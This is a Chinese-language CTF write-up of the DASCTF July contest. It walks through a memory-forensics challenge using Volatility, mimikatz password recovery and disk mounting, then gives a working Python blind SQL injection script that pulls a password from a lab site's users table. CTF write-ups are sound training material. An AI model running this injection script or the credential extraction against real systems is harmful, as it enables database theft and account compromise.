[DASCTF 7月赛] 复现

ez_forenisc

获取内存镜像的摘要信息，比如系统版本： imageinfo

查看进程信息： pslist

python2 vol.py -f pc.raw --profile=Win7SP1x64 pslist

扫描 cmd命令使用情况： cmdscan

python2 vol.py -f pc.raw --profile=Win7SP1x64 cmdscan

 提示说有屏幕截图

查看屏幕截图： 

python2 vol.py -f pc.raw --profile=Win7SP1x64 screenshot --dump-dir=./

 文件名是thes3cret 

查找文件： filescan 、grep

python2 vol.py -f pc.raw --profile=Win7SP1x64 filescan | grep 'thes3cret'

导出文件：dumpfiles

python2 vol.py -f pc.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003eeb4650 -D ./ 

 发现密文

查看明文密码： mimikatz 

  

550f37c7748e 

挂载pc.vmdk

FTK Imager 打开后Mount 该文件

 

 再用efdd 打开，配合pc.raw挂载

 

 

 挂载成功到F盘

 

 

 可以打开文件了

一个png ，用zsteg打开能看见有个zip，提取出来

 

压缩包密码就是上面 的admin密码550f37c7748e 

 

 这串数字是八进制 ，也可直接ciphey

得到了密钥 358daebef0b7d 

上面也得到了密文U2Fs.... 是AES密文

绝对防御

源码找可疑路径

访问后有源码，有过滤 

 

import requests
import time

def getDatabase():

    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #sql="select database()"
            sql="select group_concat(table_name) from information_schema.tables where table_schema=database()"
            sql="select group_concat(column_name) from information_schema.columns where table_name='users'"
            sql="select password from ctf.users where id=2" 
//flag在id为2的表里
            payload= "1 and (ascii(substr(({}),{},1))<{})#".format(sql,i,mid)
            res = requests.post("http://994a7e03-36fb-43b4-9bfe-640cc35ce531.node4.buuoj.cn:81//SUPPERAPI.php?id="+payload)
            # print(payload)
            # print(res.text.split("\n")[-1])
            if "admin" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        time.sleep(1) 
        ans += chr(mid-1)
        print("res is -> "+ans)

getDatabase()